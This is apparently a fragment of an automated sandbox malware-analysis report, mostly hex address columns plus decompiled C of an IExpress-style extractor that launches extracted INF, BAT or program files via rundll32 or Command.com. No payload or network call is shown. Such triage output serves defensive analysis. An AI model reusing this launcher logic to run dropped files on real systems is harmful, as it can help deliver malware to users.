                                                                                                                                                                                                        0x00e83dfd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83e03
                                                                                                                                                                                                        0x00e83e0a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83e15
                                                                                                                                                                                                        0x00e83e17
                                                                                                                                                                                                        0x00e83e19
                                                                                                                                                                                                        0x00e83f94
                                                                                                                                                                                                        0x00e83fa4
                                                                                                                                                                                                        0x00e83f7c
                                                                                                                                                                                                        0x00e83f80
                                                                                                                                                                                                        0x00e83f8b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83f8b
                                                                                                                                                                                                        0x00e83e2c
                                                                                                                                                                                                        0x00e83e30
                                                                                                                                                                                                        0x00e83e34
                                                                                                                                                                                                        0x00e83e36
                                                                                                                                                                                                        0x00e83f69
                                                                                                                                                                                                        0x00e83f6e
                                                                                                                                                                                                        0x00e83f70
                                                                                                                                                                                                        0x00e83f76
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83f76
                                                                                                                                                                                                        0x00e83e3c
                                                                                                                                                                                                        0x00e83e43
                                                                                                                                                                                                        0x00e83e47
                                                                                                                                                                                                        0x00e83e52
                                                                                                                                                                                                        0x00e83e56
                                                                                                                                                                                                        0x00e83e5c
                                                                                                                                                                                                        0x00e83e61
                                                                                                                                                                                                        0x00e83e68
                                                                                                                                                                                                        0x00e83e70
                                                                                                                                                                                                        0x00e83e74
                                                                                                                                                                                                        0x00e83e7c
                                                                                                                                                                                                        0x00e83e80
                                                                                                                                                                                                        0x00e83e82
                                                                                                                                                                                                        0x00e83e82
                                                                                                                                                                                                        0x00e83e87
                                                                                                                                                                                                        0x00e83e87
                                                                                                                                                                                                        0x00e83e8b
                                                                                                                                                                                                        0x00e83e91
                                                                                                                                                                                                        0x00e83e94
                                                                                                                                                                                                        0x00e83e96
                                                                                                                                                                                                        0x00e83e96
                                                                                                                                                                                                        0x00e83e9b
                                                                                                                                                                                                        0x00e83e9b
                                                                                                                                                                                                        0x00e83e9f
                                                                                                                                                                                                        0x00e83ea2
                                                                                                                                                                                                        0x00e83ea4
                                                                                                                                                                                                        0x00e83ea4
                                                                                                                                                                                                        0x00e83ea9
                                                                                                                                                                                                        0x00e83ea9
                                                                                                                                                                                                        0x00e83ead
                                                                                                                                                                                                        0x00e83eb3
                                                                                                                                                                                                        0x00e83eb6
                                                                                                                                                                                                        0x00e83eb8
                                                                                                                                                                                                        0x00e83eb8
                                                                                                                                                                                                        0x00e83ebd
                                                                                                                                                                                                        0x00e83ebd
                                                                                                                                                                                                        0x00e83ec1
                                                                                                                                                                                                        0x00e83ec3
                                                                                                                                                                                                        0x00e83ec5
                                                                                                                                                                                                        0x00e83ec5
                                                                                                                                                                                                        0x00e83eca
                                                                                                                                                                                                        0x00e83eca
                                                                                                                                                                                                        0x00e83ece
                                                                                                                                                                                                        0x00e83ed5
                                                                                                                                                                                                        0x00e83ed9
                                                                                                                                                                                                        0x00e83ee0
                                                                                                                                                                                                        0x00e83ee6
                                                                                                                                                                                                        0x00e83eea
                                                                                                                                                                                                        0x00e83eec
                                                                                                                                                                                                        0x00e83eee
                                                                                                                                                                                                        0x00e83ef3
                                                                                                                                                                                                        0x00e83ef3
                                                                                                                                                                                                        0x00e83ef5
                                                                                                                                                                                                        0x00e83efa
                                                                                                                                                                                                        0x00e83efb
                                                                                                                                                                                                        0x00e83efd
                                                                                                                                                                                                        0x00e83f40
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83eff
                                                                                                                                                                                                        0x00e83eff
                                                                                                                                                                                                        0x00e83f05
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83f05
                                                                                                                                                                                                        0x00e83efd
                                                                                                                                                                                                        0x00e83dc7
                                                                                                                                                                                                        0x00e83dce
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83dd0
                                                                                                                                                                                                        0x00e83dd7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83dd9
                                                                                                                                                                                                        0x00e83ddb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83ddd
                                                                                                                                                                                                        0x00e83de1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83de1
                                                                                                                                                                                                        0x00e83d59
                                                                                                                                                                                                        0x00e83d65
                                                                                                                                                                                                        0x00e83d6a
                                                                                                                                                                                                        0x00e83d6c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83d6e
                                                                                                                                                                                                        0x00e83d75
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83d8f
                                                                                                                                                                                                        0x00e83d96
                                                                                                                                                                                                        0x00e83d98
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83d98
                                                                                                                                                                                                        0x00e83c8f
                                                                                                                                                                                                        0x00e83c98
                                                                                                                                                                                                        0x00e83cf1
                                                                                                                                                                                                        0x00e83cf3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83cfe
                                                                                                                                                                                                        0x00e83d11
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83d11
                                                                                                                                                                                                        0x00e83c9c
                                                                                                                                                                                                        0x00e83ca5
                                                                                                                                                                                                        0x00e83ca7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83cad
                                                                                                                                                                                                        0x00e83cb2
                                                                                                                                                                                                        0x00e83cb7
                                                                                                                                                                                                        0x00e83cc5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83ce8
                                                                                                                                                                                                        0x00e83cec
                                                                                                                                                                                                        0x00e83ced
                                                                                                                                                                                                        0x00e83ced
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83ce8
                                                                                                                                                                                                        0x00e83c9e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83c9e
                                                                                                                                                                                                        0x00e83c56
                                                                                                                                                                                                        0x00e83d35
                                                                                                                                                                                                        0x00e83d35
                                                                                                                                                                                                        0x00e83d3c
                                                                                                                                                                                                        0x00e83d48
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83d48
                                                                                                                                                                                                        0x00e83c03
                                                                                                                                                                                                        0x00e83be2
                                                                                                                                                                                                        0x00e83be7
                                                                                                                                                                                                        0x00e83bee
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 00E83C11
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00E83CDC
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E846A0
                                                                                                                                                                                                          • Part of subcall function 00E8468F: SizeofResource.KERNEL32(00000000,00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846A9
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E846C3
                                                                                                                                                                                                          • Part of subcall function 00E8468F: LoadResource.KERNEL32(00000000,00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846CC
                                                                                                                                                                                                          • Part of subcall function 00E8468F: LockResource.KERNEL32(00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846D3
                                                                                                                                                                                                          • Part of subcall function 00E8468F: memcpy_s.MSVCRT ref: 00E846E5
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846EF
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00E88C42), ref: 00E83D8F
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00E83E26
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00E88C42), ref: 00E83EFF
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,00E88C42), ref: 00E83F1F
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00E88C42), ref: 00E83F40
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,00E88C42), ref: 00E83F47
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00E88C42), ref: 00E83F76
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00E88C42), ref: 00E83F80
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00E88C42), ref: 00E83FC2
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                        • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$cent
                                                                                                                                                                                                        • API String ID: 1032054927-2392195619
                                                                                                                                                                                                        • Opcode ID: 71d031fd22c5ecc3539076b465d51381dbfb6440714de8074ff528632936b6ac
                                                                                                                                                                                                        • Instruction ID: ef9050c9150627b5f44b9b4465dc02d2df64e30fbec41092b3a700c2e94c4e77
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 71d031fd22c5ecc3539076b465d51381dbfb6440714de8074ff528632936b6ac
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 61B1D270A083019FD724FF358945B6AB6E4EB84B04F14292AFA8DF61E1DB70C945CB92
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 141 e81ae8-e81b2c call e81680 144 e81b3b-e81b40 141->144 145 e81b2e-e81b39 141->145 146 e81b46-e81b61 call e81a84 144->146 145->146 149 e81b9f-e81bc2 call e81781 call e8658a 146->149 150 e81b63-e81b65 146->150 157 e81bc7-e81bd3 call e866c8 149->157 152 e81b68-e81b6d 150->152 152->152 154 e81b6f-e81b74 152->154 154->149 156 e81b76-e81b7b 154->156 158 e81b7d-e81b81 156->158 159 e81b83-e81b86 156->159 166 e81bd9-e81bf1 CompareStringA 157->166 167 e81d73-e81d7f call e866c8 157->167 158->159 161 e81b8c-e81b9d call e81680 158->161 159->149 162 e81b88-e81b8a 159->162 161->157 162->149 162->161 166->167 168 e81bf7-e81c07 GetFileAttributesA 166->168 175 e81df8-e81e09 LocalAlloc 167->175 176 e81d81-e81d99 CompareStringA 167->176 170 e81c0d-e81c15 168->170 171 e81d53-e81d5e 168->171 170->171 174 e81c1b-e81c33 call e81a84 170->174 173 e81d64-e81d6e call e844b9 171->173 188 e81e94-e81ea4 call e86ce0 173->188 190 e81c50-e81c61 LocalAlloc 174->190 191 e81c35-e81c38 174->191 178 e81e0b-e81e1b GetFileAttributesA 175->178 179 e81dd4-e81ddf 175->179 176->175 181 e81d9b-e81da2 176->181 183 e81e1d-e81e1f 178->183 184 e81e67-e81e73 call e81680 178->184 179->173 186 e81da5-e81daa 181->186 183->184 189 e81e21-e81e3e call e81781 183->189 195 e81e78-e81e84 call e82aac 184->195 186->186 192 e81dac-e81db4 186->192 189->195 211 e81e40-e81e43 189->211 190->179 194 e81c67-e81c72 190->194 198 e81c3a 191->198 199 e81c40-e81c4b call e81a84 191->199 193 e81db7-e81dbc 192->193 193->193 200 e81dbe-e81dd2 LocalAlloc 193->200 202 e81c79-e81cc0 GetPrivateProfileIntA GetPrivateProfileStringA 194->202 203 e81c74 194->203 210 e81e89-e81e92 195->210 198->199 199->190 200->179 207 e81de1-e81df3 call e8171e 200->207 208 e81cf8-e81d07 202->208 209 e81cc2-e81ccc 202->209 203->202 207->210 216 e81d09-e81d21 GetShortPathNameA 208->216 217 e81d23 208->217 213 e81cce 209->213 214 e81cd3-e81cf3 call e81680 * 2 209->214 210->188 211->195 215 e81e45-e81e65 call e816b3 * 2 211->215 213->214 214->210 215->195 218 e81d28-e81d2b 216->218 217->218 222 e81d2d 218->222 223 e81d32-e81d4e call e8171e 218->223 222->223 223->210
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00E81AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v527;
                                                                                                                                                                                                        				char _v528;
                                                                                                                                                                                                        				char _v1552;
                                                                                                                                                                                                        				CHAR* _v1556;
                                                                                                                                                                                                        				int* _v1560;
                                                                                                                                                                                                        				CHAR** _v1564;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t48;
                                                                                                                                                                                                        				CHAR* _t53;
                                                                                                                                                                                                        				CHAR* _t54;
                                                                                                                                                                                                        				char* _t57;
                                                                                                                                                                                                        				char* _t58;
                                                                                                                                                                                                        				CHAR* _t60;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				signed char _t65;
                                                                                                                                                                                                        				intOrPtr _t76;
                                                                                                                                                                                                        				intOrPtr _t77;
                                                                                                                                                                                                        				unsigned int _t85;
                                                                                                                                                                                                        				CHAR* _t90;
                                                                                                                                                                                                        				CHAR* _t92;
                                                                                                                                                                                                        				char _t105;
                                                                                                                                                                                                        				char _t106;
                                                                                                                                                                                                        				CHAR** _t111;
                                                                                                                                                                                                        				CHAR* _t115;
                                                                                                                                                                                                        				intOrPtr* _t125;
                                                                                                                                                                                                        				void* _t126;
                                                                                                                                                                                                        				CHAR* _t132;
                                                                                                                                                                                                        				CHAR* _t135;
                                                                                                                                                                                                        				void* _t138;
                                                                                                                                                                                                        				void* _t139;
                                                                                                                                                                                                        				void* _t145;
                                                                                                                                                                                                        				intOrPtr* _t146;
                                                                                                                                                                                                        				char* _t148;
                                                                                                                                                                                                        				CHAR* _t151;
                                                                                                                                                                                                        				void* _t152;
                                                                                                                                                                                                        				CHAR* _t155;
                                                                                                                                                                                                        				CHAR* _t156;
                                                                                                                                                                                                        				void* _t157;
                                                                                                                                                                                                        				signed int _t158;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t48 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                        				_t108 = __ecx;
                                                                                                                                                                                                        				_v1564 = _a4;
                                                                                                                                                                                                        				_v1560 = _a8;
                                                                                                                                                                                                        				E00E81680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                        				if(_v528 != 0x22) {
                                                                                                                                                                                                        					_t135 = " ";
                                                                                                                                                                                                        					_t53 =  &_v528;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t135 = "\"";
                                                                                                                                                                                                        					_t53 =  &_v527;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t111 =  &_v1556;
                                                                                                                                                                                                        				_v1556 = _t53;
                                                                                                                                                                                                        				_t54 = E00E81A84(_t111, _t135);
                                                                                                                                                                                                        				_t156 = _v1556;
                                                                                                                                                                                                        				_t151 = _t54;
                                                                                                                                                                                                        				if(_t156 == 0) {
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					_push(_t111);
                                                                                                                                                                                                        					E00E81781( &_v268, 0x104, _t111, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                        					E00E8658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t132 = _t156;
                                                                                                                                                                                                        					_t148 =  &(_t132[1]);
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t105 =  *_t132;
                                                                                                                                                                                                        						_t132 =  &(_t132[1]);
                                                                                                                                                                                                        					} while (_t105 != 0);
                                                                                                                                                                                                        					_t111 = _t132 - _t148;
                                                                                                                                                                                                        					if(_t111 < 3) {
                                                                                                                                                                                                        						goto L12;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t106 = _t156[1];
                                                                                                                                                                                                        					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                        						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                        							goto L12;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							goto L11;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						L11:
                                                                                                                                                                                                        						E00E81680( &_v268, 0x104, _t156);
                                                                                                                                                                                                        						L13:
                                                                                                                                                                                                        						_t138 = 0x2e;
                                                                                                                                                                                                        						_t57 = E00E866C8(_t156, _t138);
                                                                                                                                                                                                        						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                        							_t139 = 0x2e;
                                                                                                                                                                                                        							_t115 = _t156;
                                                                                                                                                                                                        							_t58 = E00E866C8(_t115, _t139);
                                                                                                                                                                                                        							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                        								_t156 = LocalAlloc(0x40, 0x400);
                                                                                                                                                                                                        								if(_t156 == 0) {
                                                                                                                                                                                                        									goto L43;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t65 = GetFileAttributesA( &_v268); // executed
                                                                                                                                                                                                        								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                                                                                                                                                        									E00E81680( &_v1552, 0x400, _t108);
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_push(_t115);
                                                                                                                                                                                                        									_t108 = 0x400;
                                                                                                                                                                                                        									E00E81781( &_v1552, 0x400, _t115,  &_v268);
                                                                                                                                                                                                        									if(_t151 != 0 &&  *_t151 != 0) {
                                                                                                                                                                                                        										E00E816B3( &_v1552, 0x400, " ");
                                                                                                                                                                                                        										E00E816B3( &_v1552, 0x400, _t151);
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t140 = _t156;
                                                                                                                                                                                                        								 *_t156 = 0;
                                                                                                                                                                                                        								E00E82AAC( &_v1552, _t156, _t156);
                                                                                                                                                                                                        								goto L53;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t108 = "Command.com /c %s";
                                                                                                                                                                                                        								_t125 = "Command.com /c %s";
                                                                                                                                                                                                        								_t145 = _t125 + 1;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t76 =  *_t125;
                                                                                                                                                                                                        									_t125 = _t125 + 1;
                                                                                                                                                                                                        								} while (_t76 != 0);
                                                                                                                                                                                                        								_t126 = _t125 - _t145;
                                                                                                                                                                                                        								_t146 =  &_v268;
                                                                                                                                                                                                        								_t157 = _t146 + 1;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t77 =  *_t146;
                                                                                                                                                                                                        									_t146 = _t146 + 1;
                                                                                                                                                                                                        								} while (_t77 != 0);
                                                                                                                                                                                                        								_t140 = _t146 - _t157;
                                                                                                                                                                                                        								_t154 = _t126 + 8 + _t146 - _t157;
                                                                                                                                                                                                        								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                                                                                                                                                        								if(_t156 != 0) {
                                                                                                                                                                                                        									E00E8171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                                                                                                                                                        									goto L53;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L43;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t85 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                                                                                                                                                        								_t140 = 0x525;
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0x10);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_t60 =  &_v268;
                                                                                                                                                                                                        								goto L35;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t140 = "[";
                                                                                                                                                                                                        								_v1556 = _t151;
                                                                                                                                                                                                        								_t90 = E00E81A84( &_v1556, "[");
                                                                                                                                                                                                        								if(_t90 != 0) {
                                                                                                                                                                                                        									if( *_t90 != 0) {
                                                                                                                                                                                                        										_v1556 = _t90;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t140 = "]";
                                                                                                                                                                                                        									E00E81A84( &_v1556, "]");
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                        								if(_t156 == 0) {
                                                                                                                                                                                                        									L43:
                                                                                                                                                                                                        									_t60 = 0;
                                                                                                                                                                                                        									_t140 = 0x4b5;
                                                                                                                                                                                                        									_push(0);
                                                                                                                                                                                                        									_push(0x10);
                                                                                                                                                                                                        									_push(0);
                                                                                                                                                                                                        									L35:
                                                                                                                                                                                                        									_push(_t60);
                                                                                                                                                                                                        									E00E844B9(0, _t140);
                                                                                                                                                                                                        									_t62 = 0;
                                                                                                                                                                                                        									goto L54;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t155 = _v1556;
                                                                                                                                                                                                        									_t92 = _t155;
                                                                                                                                                                                                        									if( *_t155 == 0) {
                                                                                                                                                                                                        										_t92 = "DefaultInstall";
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									 *0xe89120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                        									 *_v1560 = 1;
                                                                                                                                                                                                        									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xe81140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                        										 *0xe89a34 =  *0xe89a34 & 0xfffffffb;
                                                                                                                                                                                                        										if( *0xe89a40 != 0) {
                                                                                                                                                                                                        											_t108 = "setupapi.dll";
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t108 = "setupx.dll";
                                                                                                                                                                                                        											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										if( *_t155 == 0) {
                                                                                                                                                                                                        											_t155 = "DefaultInstall";
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_push( &_v268);
                                                                                                                                                                                                        										_push(_t155);
                                                                                                                                                                                                        										E00E8171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										 *0xe89a34 =  *0xe89a34 | 0x00000004;
                                                                                                                                                                                                        										if( *_t155 == 0) {
                                                                                                                                                                                                        											_t155 = "DefaultInstall";
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										E00E81680(_t108, 0x104, _t155);
                                                                                                                                                                                                        										_t140 = 0x200;
                                                                                                                                                                                                        										E00E81680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									L53:
                                                                                                                                                                                                        									_t62 = 1;
                                                                                                                                                                                                        									 *_v1564 = _t156;
                                                                                                                                                                                                        									L54:
                                                                                                                                                                                                        									_pop(_t152);
                                                                                                                                                                                                        									return E00E86CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}














































                                                                                                                                                                                                        0x00e81af3
                                                                                                                                                                                                        0x00e81afa
                                                                                                                                                                                                        0x00e81b07
                                                                                                                                                                                                        0x00e81b09
                                                                                                                                                                                                        0x00e81b1a
                                                                                                                                                                                                        0x00e81b20
                                                                                                                                                                                                        0x00e81b2c
                                                                                                                                                                                                        0x00e81b3b
                                                                                                                                                                                                        0x00e81b40
                                                                                                                                                                                                        0x00e81b2e
                                                                                                                                                                                                        0x00e81b2e
                                                                                                                                                                                                        0x00e81b33
                                                                                                                                                                                                        0x00e81b33
                                                                                                                                                                                                        0x00e81b46
                                                                                                                                                                                                        0x00e81b4c
                                                                                                                                                                                                        0x00e81b52
                                                                                                                                                                                                        0x00e81b57
                                                                                                                                                                                                        0x00e81b5d
                                                                                                                                                                                                        0x00e81b61
                                                                                                                                                                                                        0x00e81b9f
                                                                                                                                                                                                        0x00e81b9f
                                                                                                                                                                                                        0x00e81bb1
                                                                                                                                                                                                        0x00e81bc2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e81b63
                                                                                                                                                                                                        0x00e81b63
                                                                                                                                                                                                        0x00e81b65
                                                                                                                                                                                                        0x00e81b68
                                                                                                                                                                                                        0x00e81b68
                                                                                                                                                                                                        0x00e81b6a
                                                                                                                                                                                                        0x00e81b6b
                                                                                                                                                                                                        0x00e81b6f
                                                                                                                                                                                                        0x00e81b74
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e81b76
                                                                                                                                                                                                        0x00e81b7b
                                                                                                                                                                                                        0x00e81b86
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e81b8c
                                                                                                                                                                                                        0x00e81b8c
                                                                                                                                                                                                        0x00e81b98
                                                                                                                                                                                                        0x00e81bc7
                                                                                                                                                                                                        0x00e81bc9
                                                                                                                                                                                                        0x00e81bcc
                                                                                                                                                                                                        0x00e81bd3
                                                                                                                                                                                                        0x00e81d75
                                                                                                                                                                                                        0x00e81d76
                                                                                                                                                                                                        0x00e81d78
                                                                                                                                                                                                        0x00e81d7f
                                                                                                                                                                                                        0x00e81e05
                                                                                                                                                                                                        0x00e81e09
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e81e12
                                                                                                                                                                                                        0x00e81e1b
                                                                                                                                                                                                        0x00e81e73
                                                                                                                                                                                                        0x00e81e21
                                                                                                                                                                                                        0x00e81e21
                                                                                                                                                                                                        0x00e81e28
                                                                                                                                                                                                        0x00e81e37
                                                                                                                                                                                                        0x00e81e3e
                                                                                                                                                                                                        0x00e81e52
                                                                                                                                                                                                        0x00e81e60
                                                                                                                                                                                                        0x00e81e60
                                                                                                                                                                                                        0x00e81e3e
                                                                                                                                                                                                        0x00e81e79
                                                                                                                                                                                                        0x00e81e7b
                                                                                                                                                                                                        0x00e81e84
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e81d9b
                                                                                                                                                                                                        0x00e81d9b
                                                                                                                                                                                                        0x00e81da0
                                                                                                                                                                                                        0x00e81da2
                                                                                                                                                                                                        0x00e81da5
                                                                                                                                                                                                        0x00e81da5
                                                                                                                                                                                                        0x00e81da7
                                                                                                                                                                                                        0x00e81da8
                                                                                                                                                                                                        0x00e81dac
                                                                                                                                                                                                        0x00e81dae
                                                                                                                                                                                                        0x00e81db4
                                                                                                                                                                                                        0x00e81db7
                                                                                                                                                                                                        0x00e81db7
                                                                                                                                                                                                        0x00e81db9
                                                                                                                                                                                                        0x00e81dba
                                                                                                                                                                                                        0x00e81dbe
                                                                                                                                                                                                        0x00e81dc3
                                                                                                                                                                                                        0x00e81dce
                                                                                                                                                                                                        0x00e81dd2
                                                                                                                                                                                                        0x00e81deb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e81df0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e81dd2
                                                                                                                                                                                                        0x00e81bf7
                                                                                                                                                                                                        0x00e81bfe
                                                                                                                                                                                                        0x00e81c07
                                                                                                                                                                                                        0x00e81d55
                                                                                                                                                                                                        0x00e81d5a
